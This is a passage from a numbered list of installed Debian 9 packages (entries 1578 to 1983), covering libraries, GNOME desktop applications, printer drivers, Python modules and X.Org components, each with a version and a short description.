  1578. libwinpr-synch0.1:i386 1.1.0~git20140921.1.440916e+dfsg1-13+deb9u1 Windows Portable Runtime library (synch library)
  1579. libwinpr-sysinfo0.1:i386 1.1.0~git20140921.1.440916e+dfsg1-13+deb9u1 Windows Portable Runtime library (sysinfo library)
  1580. libwinpr-thread0.1:i386 1.1.0~git20140921.1.440916e+dfsg1-13+deb9u1 Windows Portable Runtime library (thread library)
  1581. libwinpr-utils0.1:i386 1.1.0~git20140921.1.440916e+dfsg1-13+deb9u1 Windows Portable Runtime library (utils library)
  1582. libwmf-bin 0.2.8.4-10.6 Windows metafile conversion tools
  1583. libwmf0.2-7:i386 0.2.8.4-10.6 Windows metafile conversion library
  1584. libwnck-3-0:i386 3.20.1-3 Window Navigator Construction Kit - runtime files
  1585. libwnck-3-common 3.20.1-3 Window Navigator Construction Kit - common files
  1586. libwpd-0.10-10:i386 0.10.1-5 Library for handling WordPerfect documents (shared library)
  1587. libwpg-0.3-3:i386 0.3.1-3 WordPerfect graphics import/convert library (shared library)
  1588. libwps-0.4-4:i386 0.4.5-1 Works text file format import filter library (shared library)
  1589. libwrap0:i386 7.6.q-26 Wietse Venema's TCP wrappers library
  1590. libwww-perl 6.15-1 simple and consistent interface to the world-wide web
  1591. libwww-robotrules-perl 6.01-1 database of robots.txt-derived permissions
  1592. libx11-6:i386 2:1.6.4-3 X11 client-side library
  1593. libx11-data 2:1.6.4-3 X11 client-side library
  1594. libx11-protocol-perl 0.56-7 Perl module for the X Window System Protocol, version 11
  1595. libx11-xcb1:i386 2:1.6.4-3 Xlib/XCB interface library
  1596. libx264-148:i386 2:0.148.2748+git97eaef2-1 x264 video coding library
  1597. libx265-95:i386 2.1-2+b2 H.265/HEVC video stream encoder (shared library)
  1598. libxapian30:i386 1.4.3-2 Search engine library
  1599. libxatracker2:i386 13.0.6-1+b2 X acceleration library -- runtime
  1600. libxau6:i386 1:1.0.8-1 X11 authorisation library
  1601. libxaw7:i386 2:1.0.13-1+b2 X11 Athena Widget library
  1602. libxcb-dri2-0:i386 1.12-1 X C Binding, dri2 extension
  1603. libxcb-dri3-0:i386 1.12-1 X C Binding, dri3 extension
  1604. libxcb-glx0:i386 1.12-1 X C Binding, glx extension
  1605. libxcb-icccm4:i386 0.4.1-1 utility libraries for X C Binding -- icccm
  1606. libxcb-image0:i386 0.4.0-1+b2 utility libraries for X C Binding -- image
  1607. libxcb-keysyms1:i386 0.4.0-1+b2 utility libraries for X C Binding -- keysyms
  1608. libxcb-present0:i386 1.12-1 X C Binding, present extension
  1609. libxcb-randr0:i386 1.12-1 X C Binding, randr extension
  1610. libxcb-render-util0:i386 0.3.9-1 utility libraries for X C Binding -- render-util
  1611. libxcb-render0:i386 1.12-1 X C Binding, render extension
  1612. libxcb-res0:i386 1.12-1 X C Binding, res extension
  1613. libxcb-shape0:i386 1.12-1 X C Binding, shape extension
  1614. libxcb-shm0:i386 1.12-1 X C Binding, shm extension
  1615. libxcb-sync1:i386 1.12-1 X C Binding, sync extension
  1616. libxcb-util0:i386 0.3.8-3+b2 utility libraries for X C Binding -- atom, aux and event
  1617. libxcb-xf86dri0:i386 1.12-1 X C Binding, xf86dri extension
  1618. libxcb-xfixes0:i386 1.12-1 X C Binding, xfixes extension
  1619. libxcb-xkb1:i386 1.12-1 X C Binding, XKEYBOARD extension
  1620. libxcb-xv0:i386 1.12-1 X C Binding, xv extension
  1621. libxcb1:i386 1.12-1 X C Binding
  1622. libxcomposite1:i386 1:0.4.4-2 X11 Composite extension library
  1623. libxcursor1:i386 1:1.1.14-1+b4 X cursor management library
  1624. libxdamage1:i386 1:1.1.4-2+b3 X11 damaged region extension library
  1625. libxdmcp6:i386 1:1.1.2-3 X11 Display Manager Control Protocol library
  1626. libxext6:i386 2:1.3.3-1+b2 X11 miscellaneous extension library
  1627. libxfixes3:i386 1:5.0.3-1 X11 miscellaneous 'fixes' extension library
  1628. libxfont1:i386 1:1.5.2-4 X11 font rasterisation library
  1629. libxfont2:i386 1:2.0.1-3 X11 font rasterisation library
  1630. libxft2:i386 2.3.2-1+b2 FreeType-based font drawing library for X
  1631. libxi6:i386 2:1.7.9-1 X11 Input extension library
  1632. libxinerama1:i386 2:1.1.3-1+b3 X11 Xinerama extension library
  1633. libxkbcommon-x11-0:i386 0.7.1-1 library to create keymaps with the XKB X11 protocol
  1634. libxkbcommon0:i386 0.7.1-1 library interface to the XKB compiler - shared library
  1635. libxkbfile1:i386 1:1.0.9-2 X11 keyboard file manipulation library
  1636. libxklavier16:i386 5.4-2 X Keyboard Extension high-level API
  1637. libxml-parser-perl 2.44-2+b1 Perl module for parsing XML files
  1638. libxml-twig-perl 1:3.50-1 Perl module for processing huge XML documents in tree mode
  1639. libxml-xpathengine-perl 0.13-1 re-usable XPath engine for DOM-like trees
  1640. libxml2:i386 2.9.4+dfsg1-2.2 GNOME XML library
  1641. libxmu6:i386 2:1.1.2-2 X11 miscellaneous utility library
  1642. libxmuu1:i386 2:1.1.2-2 X11 miscellaneous micro-utility library
  1643. libxpm4:i386 1:3.5.12-1 X11 pixmap library
  1644. libxrandr2:i386 2:1.5.1-1 X11 RandR extension library
  1645. libxrender1:i386 1:0.9.10-1 X Rendering Extension client library
  1646. libxres1:i386 2:1.0.7-1+b3 X11 Resource extension library
  1647. libxshmfence1:i386 1.2-1+b2 X shared memory fences - shared library
  1648. libxslt1.1:i386 1.1.29-2.1 XSLT 1.0 processing library - runtime library
  1649. libxss1:i386 1:1.2.2-1 X11 Screen Saver extension library
  1650. libxt6:i386 1:1.1.5-1 X11 toolkit intrinsics library
  1651. libxtables12:i386 1.6.0+snapshot20161117-6 netfilter xtables library
  1652. libxtst6:i386 2:1.2.3-1 X11 Testing -- Record extension library
  1653. libxv1:i386 2:1.0.11-1 X11 Video extension library
  1654. libxvidcore4:i386 2:1.3.4-1+b2 Open source MPEG-4 video codec (library)
  1655. libxvmc1:i386 2:1.0.10-1 X11 Video extension library
  1656. libxxf86dga1:i386 2:1.1.4-1+b3 X11 Direct Graphics Access extension library
  1657. libxxf86vm1:i386 1:1.1.4-1+b2 X11 XFree86 video mode extension library
  1658. libyajl2:i386 2.1.0-2+b3 Yet Another JSON Library
  1659. libyaml-0-2:i386 0.1.7-2 Fast YAML 1.1 parser and emitter library
  1660. libyelp0:i386 3.22.0-1 Library for the GNOME help browser
  1661. libytnef0:i386 1.9.2-2 improved decoder for application/ms-tnef attachments
  1662. libzapojit-0.0-0:i386 0.0.3-3 Library for accessing SkyDrive and Hotmail - shared libraries
  1663. libzbar0:i386 0.10+doc-10.1 bar code scanner and decoder (library)
  1664. libzeitgeist-2.0-0:i386 0.9.16-0.2+b1 library to access Zeitgeist - shared library
  1665. libzmq5:i386 4.2.1-4 lightweight messaging kernel (shared library)
  1666. libzvbi-common 0.2.35-13 Vertical Blanking Interval decoder (VBI) - common files
  1667. libzvbi0:i386 0.2.35-13 Vertical Blanking Interval decoder (VBI) - runtime files
  1668. lightsoff 1:3.22.2-1 Light puzzle game
  1669. linux-base 4.5 Linux image base package
  1670. linux-image-4.9.0-3-686-pae 4.9.30-2+deb9u3 Linux 4.9 for modern PCs
  1671. linux-image-686-pae 4.9+80 Linux for modern PCs (meta-package)
  1672. locales 2.24-11+deb9u1 GNU C Library: National Language (locale) data [support]
  1673. login 1:4.4-4.1 system login tools
  1674. logrotate 3.11.0-0.1 Log rotation utility
  1675. lp-solve 5.5.0.15-4+b1 Solve (mixed integer) linear programming problems
  1676. lsb-base 9.20161125 Linux Standard Base init script functionality
  1677. lsb-release 9.20161125 Linux Standard Base version reporting utility
  1678. lsof 4.89+dfsg-0.1 Utility to list open files
  1679. lua-bitop:i386 1.0.2-4 fast bit manipulation library for the Lua language
  1680. lua-expat:i386 1.3.0-4 libexpat bindings for the Lua language
  1681. lua-json 1.3.3-2 JSON decoder/encoder for Lua
  1682. lua-lpeg:i386 1.0.0-1 LPeg library for the Lua language
  1683. lua-socket:i386 3.0~rc1+git+ac3201d-3 TCP/UDP socket library for the Lua language
  1684. man-db 2.7.6.1-2 on-line manual pager
  1685. manpages 4.10-2 Manual pages about using a GNU/Linux system
  1686. mawk 1.3.3-17+b3 a pattern scanning and text processing language
  1687. media-player-info 22-3 Media player identification files
  1688. mesa-va-drivers:i386 13.0.6-1+b2 Mesa VA-API video acceleration drivers
  1689. mesa-vdpau-drivers:i386 13.0.6-1+b2 Mesa VDPAU video acceleration drivers
  1690. mime-support 3.60 MIME files 'mime.types' & 'mailcap', and support programs
  1691. minissdpd 1.2.20130907-4.1 keep memory of all UPnP devices that announced themselves
  1692. mobile-broadband-provider-info 20161204-1 database of mobile broadband service providers
  1693. modemmanager 1.6.4-1 D-Bus service for managing modems
  1694. mount 2.29.2-1 tools for mounting and manipulating filesystems
  1695. mousetweaks 3.12.0-1+b1 mouse accessibility enhancements for the GNOME desktop
  1696. mscompress 0.4-3+b1 Microsoft "compress.exe/expand.exe" compatible (de)compressor
  1697. multiarch-support 2.24-11+deb9u1 Transitional package to ensure multiarch compatibility
  1698. mutter 3.22.3-2 lightweight GTK+ window manager
  1699. mutter-common 3.22.3-2 shared files for the Mutter window manager
  1700. mythes-en-us 1:5.2.5-1 English (USA) Thesaurus for LibreOffice
  1701. nano 2.7.4-1 small, friendly text editor inspired by Pico
  1702. nautilus 3.22.3-1 file manager and graphical shell for GNOME
  1703. nautilus-data 3.22.3-1 data files for nautilus
  1704. nautilus-sendto 3.8.4-2+b1 easily send files via email from within Nautilus
  1705. ncurses-base 6.0+20161126-1 basic terminal type definitions
  1706. ncurses-bin 6.0+20161126-1 terminal-related programs and man pages
  1707. ncurses-term 6.0+20161126-1 additional terminal type definitions
  1708. net-tools 1.60+git20161116.90da8a0-1 NET-3 networking toolkit
  1709. netbase 5.4 Basic TCP/IP networking system
  1710. netcat-traditional 1.10-41+b1 TCP/IP swiss army knife
  1711. netpbm 2:10.0-15.3+b2 Graphics conversion tools between image formats
  1712. network-manager 1.6.2-3 network management framework (daemon and userspace tools)
  1713. network-manager-gnome 1.4.4-1 network management framework (GNOME frontend)
  1714. notification-daemon 3.20.0-1+b1 daemon for displaying passive pop-up notifications
  1715. ntfs-3g 1:2016.2.22AR.1+dfsg-1 read/write NTFS driver for FUSE
  1716. openjdk-8-jre:i386 8u141-b15-1~deb9u1 OpenJDK Java runtime, using Hotspot JIT
  1717. openjdk-8-jre-headless:i386 8u141-b15-1~deb9u1 OpenJDK Java runtime, using Hotspot JIT (headless)
  1718. openprinting-ppds 20161201-1 OpenPrinting printer support - PostScript PPD files
  1719. openssh-client 1:7.4p1-10+deb9u1 secure shell (SSH) client, for secure access to remote machines
  1720. openssh-server 1:7.4p1-10+deb9u1 secure shell (SSH) server, for secure access from remote machines
  1721. openssh-sftp-server 1:7.4p1-10+deb9u1 secure shell (SSH) sftp server module, for SFTP access from remote machines
  1722. openssl 1.1.0f-3 Secure Sockets Layer toolkit - cryptographic utility
  1723. os-prober 1.75 utility to detect other OSes on a set of drives
  1724. osinfo-db 0.20170225-2 Operating system database files
  1725. p11-kit 0.23.3-2 p11-glue utilities
  1726. p11-kit-modules:i386 0.23.3-2 p11-glue proxy and trust modules
  1727. p7zip 16.02+dfsg-3 7zr file archiver with high compression ratio
  1728. p7zip-full 16.02+dfsg-3 7z and 7za file archivers with high compression ratio
  1729. packagekit 1.1.5-2 Provides a package management service
  1730. packagekit-tools 1.1.5-2 Provides PackageKit command-line tools
  1731. parted 3.2-17 disk partition manipulator
  1732. passwd 1:4.4-4.1 change and administer password and group data
  1733. patch 2.7.5-1+b2 Apply a diff file to an original
  1734. pciutils 1:3.5.2-1 Linux PCI Utilities
  1735. perl 5.24.1-3 Larry Wall's Practical Extraction and Report Language
  1736. perl-base 5.24.1-3 minimal Perl system
  1737. perl-modules-5.24 5.24.1-3 Core Perl modules
  1738. perl-openssl-defaults:i386 3 version compatibility baseline for Perl OpenSSL packages
  1739. pinentry-curses 1.0.0-2 curses-based PIN or pass-phrase entry dialog for GnuPG
  1740. pinentry-gnome3 1.0.0-2 GNOME 3 PIN or pass-phrase entry dialog for GnuPG
  1741. polari 3.22.2-1 Internet Relay Chat (IRC) client
  1742. policykit-1 0.105-18 framework for managing administrative policies and privileges
  1743. poppler-data 0.4.7-8 encoding data for the poppler PDF rendering library
  1744. poppler-utils 0.48.0-2 PDF utilities (based on Poppler)
  1745. powermgmt-base 1.31+nmu1 Common utils and configs for power management
  1746. ppp 2.4.7-1+4 Point-to-Point Protocol (PPP) - daemon
  1747. printer-driver-all 0.20170123 printer drivers metapackage
  1748. printer-driver-brlaser 3-5+b1 printer driver for (some) Brother laser printers
  1749. printer-driver-c2050 0.3b-7 printer driver for Lexmark 2050 Color Jetprinter
  1750. printer-driver-c2esp 27-3+b1 printer driver for Kodak ESP AiO color inkjet Series
  1751. printer-driver-cjet 0.8.9-6+b2 printer driver for Canon LBP laser printers
  1752. printer-driver-dymo 1.4.0-6+b1 printer driver for DYMO label printers
  1753. printer-driver-escpr 1.6.11-1 printer driver for Epson Inkjet that use ESC/P-R
  1754. printer-driver-foo2zjs 20160902dfsg0-2+b1 printer driver for ZjStream-based printers
  1755. printer-driver-foo2zjs-common 20160902dfsg0-2 printer driver for ZjStream-based printers - common files
  1756. printer-driver-gutenprint 5.2.11-1+b2 printer drivers for CUPS
  1757. printer-driver-hpcups 3.16.11+repack0-3 HP Linux Printing and Imaging - CUPS Raster driver (hpcups)
  1758. printer-driver-hpijs 3.16.11+repack0-3 HP Linux Printing and Imaging - printer driver (hpijs)
  1759. printer-driver-m2300w 0.51-12+b1 printer driver for Minolta magicolor 2300W/2400W color laser printers
  1760. printer-driver-min12xxw 0.0.9-9+b1 printer driver for KonicaMinolta PagePro 1[234]xxW
  1761. printer-driver-pnm2ppa 1.13-8 printer driver for HP-GDI printers
  1762. printer-driver-postscript-hp 3.16.11+repack0-3 HP Printers PostScript Descriptions
  1763. printer-driver-ptouch 1.4.2-2+b1 printer driver Brother P-touch label printers
  1764. printer-driver-pxljr 1.4+repack0-4+b2 printer driver for HP Color LaserJet 35xx/36xx
  1765. printer-driver-sag-gdi 0.1-4 printer driver for Ricoh Aficio SP 1000s/SP 1100s
  1766. printer-driver-splix 2.0.0+svn315-6 Driver for Samsung and Xerox SPL2 and SPLc laser printers
  1767. procps 2:3.3.12-3 /proc file system utilities
  1768. psmisc 22.21-2.1+b2 utilities that use the proc file system
  1769. pulseaudio 10.0-1 PulseAudio sound server
  1770. pulseaudio-module-bluetooth 10.0-1 Bluetooth module for PulseAudio sound server
  1771. pulseaudio-utils 10.0-1 Command line tools for the PulseAudio sound server
  1772. python 2.7.13-2 interactive high-level object-oriented language (default version)
  1773. python-apt-common 1.4.0~beta3 Python interface to libapt-pkg (locales)
  1774. python-bs4 4.5.3-1 error-tolerant HTML parser for Python
  1775. python-cairo 1.8.8-2.2 Python bindings for the Cairo vector graphics library
  1776. python-cffi-backend 1.9.1-2 Foreign Function Interface for Python calling C code - backend
  1777. python-chardet 2.3.0-2 universal character encoding detector for Python2
  1778. python-cryptography 1.7.1-3 Python library exposing cryptographic recipes and primitives (Python 2)
  1779. python-enum34 1.1.6-1 backport of Python 3.4's enum package
  1780. python-gi 3.22.0-2 Python 2.x bindings for gobject-introspection libraries
  1781. python-gobject-2 2.28.6-13 deprecated static Python bindings for the GObject library
  1782. python-gtk2 2.24.0-5.1 Python bindings for the GTK+ widget set
  1783. python-html5lib 0.999999999-1 HTML parser/tokenizer based on the WHATWG HTML5 specification
  1784. python-idna 2.2-1 Python IDNA2008 (RFC 5891) handling (Python 2)
  1785. python-ipaddress 1.0.17-1 Backport of Python 3 ipaddress module (Python 2)
  1786. python-lxml 3.7.1-1 pythonic binding for the libxml2 and libxslt libraries
  1787. python-minimal 2.7.13-2 minimal subset of the Python language (default version)
  1788. python-numpy 1:1.12.1-3 Numerical Python adds a fast array facility to the Python language
  1789. python-openssl 16.2.0-1 Python 2 wrapper around the OpenSSL library
  1790. python-pkg-resources 33.1.1-1 Package Discovery and Resource Access using pkg_resources
  1791. python-pyasn1 0.1.9-2 ASN.1 library for Python (Python 2 module)
  1792. python-requests 2.12.4-1 elegant and simple HTTP library for Python2, built for human beings
  1793. python-setuptools 33.1.1-1 Python Distutils Enhancements
  1794. python-six 1.10.0-3 Python 2 and 3 compatibility library (Python 2 interface)
  1795. python-talloc 2.1.8-1 hierarchical pool based memory allocator - Python bindings
  1796. python-urllib3 1.19.1-1 HTTP library with thread-safe connection pooling for Python
  1797. python-webencodings 0.5-2 Python implementation of the WHATWG Encoding standard
  1798. python2.7 2.7.13-2 Interactive high-level object-oriented language (version 2.7)
  1799. python2.7-minimal 2.7.13-2 Minimal subset of the Python language (version 2.7)
  1800. python3 3.5.3-1 interactive high-level object-oriented language (default python3 version)
  1801. python3-apt 1.4.0~beta3 Python 3 interface to libapt-pkg
  1802. python3-brlapi 5.4-7 Braille display access via BRLTTY - Python3 bindings
  1803. python3-cairo 1.10.0+dfsg-5+b1 Python 3 bindings for the Cairo vector graphics library
  1804. python3-chardet 2.3.0-2 universal character encoding detector for Python3
  1805. python3-cups 1.9.73-1 Python3 bindings for CUPS
  1806. python3-cupshelpers 1.5.7-3 Python utility modules around the CUPS printing system
  1807. python3-dbus 1.2.4-1+b1 simple interprocess messaging system (Python 3 interface)
  1808. python3-debian 0.1.30 Python 3 modules to work with Debian-related data formats
  1809. python3-debianbts 2.6.1 Python interface to Debian's Bug Tracking System
  1810. python3-gi 3.22.0-2 Python 3 bindings for gobject-introspection libraries
  1811. python3-gi-cairo 3.22.0-2 Python 3 Cairo bindings for the GObject library
  1812. python3-httplib2 0.9.2+dfsg-1 comprehensive HTTP client library written for Python3
  1813. python3-louis 3.0.0-3 Python bindings for liblouis
  1814. python3-mako 1.0.6+ds1-2 fast and lightweight templating for the Python 3 platform
  1815. python3-markupsafe 0.23-3 HTML/XHTML/XML string library for Python 3
  1816. python3-minimal 3.5.3-1 minimal subset of the Python language (default python3 version)
  1817. python3-pexpect 4.2.1-1 Python 3 module for automating interactive applications
  1818. python3-pil:i386 4.0.0-4 Python Imaging Library (Python3)
  1819. python3-pkg-resources 33.1.1-1 Package Discovery and Resource Access using pkg_resources
  1820. python3-ptyprocess 0.5.1-1 Run a subprocess in a pseudo terminal from Python 3
  1821. python3-pyatspi 2.20.3+dfsg-1 Assistive Technology Service Provider Interface - Python3 bindings
  1822. python3-pycurl 7.43.0-2 Python bindings to libcurl (Python 3)
  1823. python3-pysimplesoap 1.16-2 simple and lightweight SOAP Library (Python 3)
  1824. python3-reportbug 7.1.7 Python modules for interacting with bug tracking systems
  1825. python3-reportlab 3.3.0-2 ReportLab library to create PDF documents using Python3
  1826. python3-reportlab-accel:i386 3.3.0-2 C coded extension accelerator for the ReportLab Toolkit
  1827. python3-requests 2.12.4-1 elegant and simple HTTP library for Python3, built for human beings
  1828. python3-six 1.10.0-3 Python 2 and 3 compatibility library (Python 3 interface)
  1829. python3-smbc 1.0.15.6-1 Python 3 bindings for the Samba client library
  1830. python3-software-properties 0.96.20.2-1 manage the repositories that you install software from
  1831. python3-speechd 0.8.6-4 Python interface to Speech Dispatcher
  1832. python3-uno 1:5.2.7-1 Python-UNO bridge
  1833. python3-urllib3 1.19.1-1 HTTP library with thread-safe connection pooling for Python3
  1834. python3-xdg 0.25-4 Python 3 library to access freedesktop.org standards
  1835. python3.5 3.5.3-1 Interactive high-level object-oriented language (version 3.5)
  1836. python3.5-minimal 3.5.3-1 Minimal subset of the Python language (version 3.5)
  1837. qpdf 6.0.0-2 tools for transforming and inspecting PDF files
  1838. quadrapassel 1:3.22.0-1.1 popular Russian game, similar to Tetris
  1839. rarian-compat 0.8.1-6+b1 Documentation meta-data library (compatibility tools)
  1840. readline-common 7.0-3 GNU readline and history libraries, common files
  1841. realmd 0.16.3-1 DBus service for configuring kerberos and other online identities
  1842. rename 0.20-4 Perl extension for renaming multiple files
  1843. reportbug 7.1.7 reports bugs in the Debian distribution
  1844. rhythmbox 3.4.1-2+b1 music player and organizer for GNOME
  1845. rhythmbox-data 3.4.1-2 data files for rhythmbox
  1846. rhythmbox-plugin-cdrecorder 3.4.1-2+b1 burning plugin for rhythmbox music player
  1847. rhythmbox-plugins 3.4.1-2+b1 plugins for rhythmbox music player
  1848. rsync 3.1.2-1 fast, versatile, remote (and local) file-copying tool
  1849. rsyslog 8.24.0-1 reliable system and kernel logging daemon
  1850. rtkit 0.11-4+b1 Realtime Policy and Watchdog Daemon
  1851. rygel 0.32.1-3 GNOME UPnP/DLNA services
  1852. rygel-playbin 0.32.1-3 GNOME UPnP/DLNA services - GStreamer Media Renderer plugin
  1853. rygel-tracker 0.32.1-3 GNOME UPnP/DLNA services - Tracker plugin
  1854. samba-libs:i386 2:4.5.8+dfsg-2+deb9u1+b1 Samba core libraries
  1855. sane-utils 1.0.25-4.1 API library for scanners -- utilities
  1856. seahorse 3.20.0-3.1 GNOME front end for GnuPG
  1857. seahorse-daemon 3.12.2-3 Seahorse pass phrase caching agent
  1858. sed 4.4-1 GNU stream editor for filtering/transforming text
  1859. sensible-utils 0.0.9 Utilities for sensible alternative selection
  1860. sgml-base 1.29 SGML infrastructure and SGML catalog file support
  1861. sgml-data 2.0.10 common SGML and XML data
  1862. shared-mime-info 1.8-1 FreeDesktop.org shared MIME database and spec
  1863. shotwell 0.25.4+really0.24.5-0.1 digital photo organizer
  1864. shotwell-common 0.25.4+really0.24.5-0.1 digital photo organizer - common files
  1865. simple-scan 3.23.2-1 Simple Scanning Utility
  1866. software-properties-common 0.96.20.2-1 manage the repositories that you install software from (common)
  1867. software-properties-gtk 0.96.20.2-1 manage the repositories that you install software from (gtk)
  1868. sound-theme-freedesktop 0.8-1 freedesktop.org sound theme
  1869. speech-dispatcher 0.8.6-4 Common interface to speech synthesizers
  1870. speech-dispatcher-audio-plugins:i386 0.8.6-4 Speech Dispatcher: Audio output plugins
  1871. spice-client-glib-usb-acl-helper 0.33-3.3 Helper tool to validate usb ACLs
  1872. ssl-cert 1.0.39 simple debconf wrapper for OpenSSL
  1873. swell-foop 1:3.22.2-1 Colored ball puzzle game
  1874. synaptic 0.84.2 Graphical package manager
  1875. system-config-printer-common 1.5.7-3 backend and the translation files for system-config-printer
  1876. system-config-printer-udev 1.5.7-3 Utilities to detect and configure printers automatically
  1877. systemd 232-25 system and service manager
  1878. systemd-sysv 232-25 system and service manager - SysV links
  1879. sysvinit-utils 2.88dsf-59.9 System-V-like utilities
  1880. tali 1:3.22.0-1 sort of poker with dice and less money
  1881. tar 1.29b-1.1 GNU version of the tar archiving utility
  1882. task-desktop 3.39 Debian desktop environment
  1883. task-english 3.39 General English environment
  1884. task-gnome-desktop 3.39 GNOME
  1885. task-print-server 3.39 print server
  1886. tasksel 3.39 tool for selecting tasks for installation on Debian systems
  1887. tasksel-data 3.39 official tasks used for installation of Debian systems
  1888. tcl 8.6.0+9 Tool Command Language (default version) - shell
  1889. tcl8.6 8.6.6+dfsg-1+b1 Tcl (the Tool Command Language) v8.6 - shell
  1890. tcpd 7.6.q-26 Wietse Venema's TCP wrapper utilities
  1891. telepathy-idle 0.2.0-2+b1 IRC connection manager for Telepathy
  1892. telepathy-logger 0.8.2-2 Telepathy logger service - Daemon
  1893. telepathy-mission-control-5 1:5.16.3-2.1 management daemon for Telepathy real-time communication framework
  1894. telnet 0.17-41 basic telnet client
  1895. tk 8.6.0+9 Toolkit for Tcl and X11 (default version) - windowing shell
  1896. tk8.6 8.6.6-1+b1 Tk toolkit for Tcl and X11 v8.6 - windowing shell
  1897. totem 3.22.1-1 Simple media player for the GNOME desktop based on GStreamer
  1898. totem-common 3.22.1-1 Data files for the Totem media player
  1899. totem-plugins 3.22.1-1 Plugins for the Totem media player
  1900. traceroute 1:2.1.0-2 Traces the route taken by packets over an IPv4/IPv6 network
  1901. tracker 1.10.5-1 metadata database, indexer and search tool
  1902. tracker-extract 1.10.5-1 metadata database, indexer and search tool - metadata extractors
  1903. tracker-gui 1.10.5-1 metadata database, indexer and search tool - GNOME frontends
  1904. tracker-miner-fs 1.10.5-1 metadata database, indexer and search tool - filesystem indexer
  1905. transfig 1:3.2.6a-2 transitional dummy package for fig2dev
  1906. transmission-common 2.92-2 lightweight BitTorrent client (common files)
  1907. transmission-gtk 2.92-2 lightweight BitTorrent client (GTK+ interface)
  1908. tzdata 2017b-1 time zone and daylight-saving time data
  1909. ucf 3.0036 Update Configuration File(s): preserve user changes to config files
  1910. udev 232-25 /dev/ and hotplug management daemon
  1911. udisks2 2.1.8-1 D-Bus service to access and manipulate storage devices
  1912. unattended-upgrades 0.93.1+nmu1 automatic installation of security upgrades
  1913. uno-libs3 5.2.7-1 LibreOffice UNO runtime environment -- public shared libraries
  1914. unoconv 0.7-1.1 converter between LibreOffice document formats
  1915. unzip 6.0-21 De-archiver for .zip files
  1916. update-inetd 4.44 inetd configuration file updater
  1917. upower 0.99.4-4+b1 abstraction for power management
  1918. ure 5.2.7-1 LibreOffice UNO runtime environment
  1919. usb-modeswitch 2.5.0+repack0-1 mode switching tool for controlling "flip flop" USB devices
  1920. usb-modeswitch-data 20170120-1 mode switching data for usb-modeswitch
  1921. usbmuxd 1.1.0-2+b2 USB multiplexor daemon for iPhone and iPod Touch devices
  1922. usbutils 1:007-4+b1 Linux USB utilities
  1923. util-linux 2.29.2-1 miscellaneous system utilities
  1924. util-linux-locales 2.29.2-1 locales files for util-linux
  1925. va-driver-all:i386 1.7.3-2 Video Acceleration (VA) API -- driver metapackage
  1926. vdpau-driver-all:i386 1.1.1-6 Video Decode and Presentation API for Unix (driver metapackage)
  1927. vim-common 2:8.0.0197-4 Vi IMproved - Common files
  1928. vim-tiny 2:8.0.0197-4 Vi IMproved - enhanced vi editor - compact version
  1929. vinagre 3.22.0-1+b1 remote desktop client for the GNOME Desktop
  1930. vino 3.22.0-1 VNC server for GNOME
  1931. wamerican 7.1-1 American English dictionary words for /usr/share/dict
  1932. wget 1.18-5 retrieves files from the web
  1933. whiptail 0.52.19-1+b1 Displays user-friendly dialog boxes from shell scripts
  1934. wireless-regdb 2016.06.10-1 wireless regulatory database
  1935. wodim 9:1.1.11-3+b2 command line CD/DVD writing tool
  1936. wpasupplicant 2:2.4-1 client support for WPA and WPA2 (IEEE 802.11i)
  1937. x11-apps 7.7+6+b1 X applications
  1938. x11-common 1:7.7+19 X Window System (X.Org) infrastructure
  1939. x11-session-utils 7.7+2+b1 X session utilities
  1940. x11-utils 7.7+3+b1 X11 utilities
  1941. x11-xkb-utils 7.7+3+b1 X11 XKB utilities
  1942. x11-xserver-utils 7.7+7+b1 X server utilities
  1943. xauth 1:1.0.9-1+b2 X authentication utility
  1944. xbitmaps 1.1.1-2 Base X bitmaps
  1945. xbrlapi 5.4-7 Access software for a blind person using a braille display - xbrlapi
  1946. xdg-user-dirs 0.15-2+b1 tool to manage well known user directories
  1947. xdg-user-dirs-gtk 0.10-1+b1 tool to manage well known user directories (Gtk extension)
  1948. xdg-utils 1.1.1-1 desktop integration utilities from freedesktop.org
  1949. xfonts-100dpi 1:1.0.4+nmu1 100 dpi fonts for X
  1950. xfonts-75dpi 1:1.0.4+nmu1 75 dpi fonts for X
  1951. xfonts-base 1:1.0.4+nmu1 standard fonts for X
  1952. xfonts-encodings 1:1.0.4-2 Encodings for X.Org fonts
  1953. xfonts-scalable 1:1.0.3-1.1 scalable fonts for X
  1954. xfonts-utils 1:7.7+4 X Window System font utility programs
  1955. xinit 1.3.4-3+b1 X server initialisation tool
  1956. xkb-data 2.19-1 X Keyboard Extension (XKB) configuration data
  1957. xml-core 0.17 XML infrastructure and XML catalog file support
  1958. xorg 1:7.7+19 X.Org X Window System
  1959. xorg-docs-core 1:1.7.1-1 Core documentation for the X.org X Window System
  1960. xserver-common 2:1.19.2-1+deb9u1 common files used by various X servers
  1961. xserver-xephyr 2:1.19.2-1+deb9u1 nested X server
  1962. xserver-xorg 1:7.7+19 X.Org X server
  1963. xserver-xorg-core 2:1.19.2-1+deb9u1 Xorg X server - core server
  1964. xserver-xorg-input-all 1:7.7+19 X.Org X server -- input driver metapackage
  1965. xserver-xorg-input-libinput 0.23.0-2 X.Org X server -- libinput input driver
  1966. xserver-xorg-input-wacom 0.34.0-1 X.Org X server -- Wacom input driver
  1967. xserver-xorg-legacy 2:1.19.2-1+deb9u1 setuid root Xorg server wrapper
  1968. xserver-xorg-video-all 1:7.7+19 X.Org X server -- output driver metapackage
  1969. xserver-xorg-video-amdgpu 1.2.0-1+b1 X.Org X server -- AMDGPU display driver
  1970. xserver-xorg-video-ati 1:7.8.0-1+b1 X.Org X server -- AMD/ATI display driver wrapper
  1971. xserver-xorg-video-fbdev 1:0.4.4-1+b5 X.Org X server -- fbdev display driver
  1972. xserver-xorg-video-intel 2:2.99.917+git20161206-1 X.Org X server -- Intel i8xx, i9xx display driver
  1973. xserver-xorg-video-nouveau 1:1.0.13-3 X.Org X server -- Nouveau display driver
  1974. xserver-xorg-video-qxl 0.1.4+20161126git4d7160c-1 X.Org X server -- QXL display driver
  1975. xserver-xorg-video-radeon 1:7.8.0-1+b1 X.Org X server -- AMD/ATI Radeon display driver
  1976. xserver-xorg-video-vesa 1:2.3.4-1+b2 X.Org X server -- VESA display driver
  1977. xserver-xorg-video-vmware 1:13.2.1-1+b1 X.Org X server -- VMware display driver
  1978. xterm 327-2 X terminal emulator
  1979. xwayland 2:1.19.2-1+deb9u1 Xwayland X server
  1980. xxd 2:8.0.0197-4 tool to make (or reverse) a hex dump
  1981. xz-utils 5.2.2-1.2+b1 XZ-format compression utilities
  1982. yelp 3.22.0-1 Help browser for GNOME
  1983. yelp-xsl 3.20.1-2 XSL stylesheets for the yelp help browser
